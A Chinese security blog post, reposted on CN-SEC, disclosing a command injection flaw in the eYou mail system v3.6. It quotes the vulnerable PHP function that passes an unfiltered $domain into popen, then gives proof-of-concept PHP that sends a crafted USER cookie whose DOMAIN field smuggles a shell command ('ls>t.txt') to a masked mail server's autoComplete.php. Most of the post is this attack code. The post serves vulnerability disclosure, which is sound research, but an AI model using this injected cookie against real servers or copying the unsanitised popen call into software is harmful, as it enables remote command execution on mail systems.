eYou邮箱系统v3.6命令执行漏洞

没穿底裤 2020年1月1日04:27:20评论1,872 views字数 948阅读3分9秒阅读模式
摘要

先看eYou的代码://获取用户目录
[php]
function getUserDir($uid, $domain) {$handle = popen("/var/eyou/sbin/hashid $uid $domain", 'r');

先看eYou的代码:

//获取用户目录
[php]
function getUserDir($uid, $domain) {

$handle = popen("/var/eyou/sbin/hashid $uid $domain", 'r');

$read = fread($handle, 2096);

pclose($handle);

return $read;

}

[/php]
$domain无过滤,直接可以执行。

接着是利用代码,没有现成的哈,自己看着来改就行了。
[php]
public function action_test()

{

$cmd = "ls>t.txt";

$request = Request::factory('http://mail.XXXXXXXXXXXX.cn/user/autoComplete.php?s=1')

->cookie('USER', "LASTONE=fake&ENTER_TYPE=0&NO_EYCM=1&GWJUMP=1&MAXRCPTNUM=150&LANG=zh_CN&TOKEN=z2GYCv1SJ&DOMAIN=test.com;{$cmd}&UID=test&LOGIN_DOMAIN=test.com&LOGIN_UID=timothy&ATTSIZE=10&CALLBACK=0&TRACEMAIL=0&GROUPADDR=0&VIEWLIST=0&GLOBALPERMISSION=0&NOTATION=0&BYTESPERCENT=0&BOOKMARK=1&MOBILEMESSAGE=0&DIALUP=0&VIDEOMAIL=0&SECUREMAIL=0&VOICEMAIL=1&CALENDAR=1&STORAGE=1&TOTALSPACE=200&LOCKSTATUS=0&USERNAME=&EXPTIME=0&LETTERS=5000"A=100&COMPANYADDR=&SKIN=current&")

->cookie('PHPSESSID', 'e1c8798afec734384cd908180e52b1cf')

->execute();

echo Debug::vars($request);

exit;

}[/php]
利用暂时不会放出来。因为某GOV的原因,封杀的很厉害

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2020年1月1日04:27:20
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   eYou邮箱系统v3.6命令执行漏洞https://cn-sec.com/archives/75178.html

发表评论

匿名网友 填写信息